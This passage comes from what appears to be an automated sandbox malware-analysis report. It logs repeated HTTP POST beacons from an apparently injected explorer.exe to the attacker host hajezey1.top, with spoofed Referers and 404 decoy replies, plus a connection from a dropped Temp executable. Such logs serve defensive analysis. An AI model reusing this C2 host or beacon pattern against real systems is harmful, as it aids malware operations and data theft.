                                                  Oct 29, 2021 20:30:05.453484058 CEST8130INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:05 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  39192.168.2.749798185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:06.196230888 CEST8130OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://xcwoodah.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 317
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:06.276673079 CEST8131INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:06 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  4192.168.2.749795162.159.135.233443C:\Users\user\AppData\Local\Temp\B82B.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  40192.168.2.749799185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:06.499706984 CEST8132OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://vtlkrwbu.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 227
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:06.580986977 CEST8133INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:06 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  41192.168.2.749800185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:06.884872913 CEST8134OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://ohksryibbc.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 333
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:06.969758034 CEST8135INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:06 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  42192.168.2.749801185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:09.149390936 CEST8136OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://aandk.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 237
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:09.230803013 CEST8137INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:09 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  43192.168.2.749802185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:09.369517088 CEST8138OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://sbvoxgf.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 167
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:09.447693110 CEST8138INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:09 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  44192.168.2.749803185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:09.592612982 CEST8140OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://qhsdwx.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 309
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:09.674103022 CEST8141INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:09 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  45192.168.2.749804185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:09.799340010 CEST8141OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://akpvscwiwg.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 322
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:09.878878117 CEST8142INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:09 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  46192.168.2.749805185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:10.025470972 CEST8143OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://fftaocheul.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 110
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:10.105526924 CEST8144INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:10 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  47192.168.2.749806185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:10.390211105 CEST8145OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://uqktie.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 194
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:10.468175888 CEST8146INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:10 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
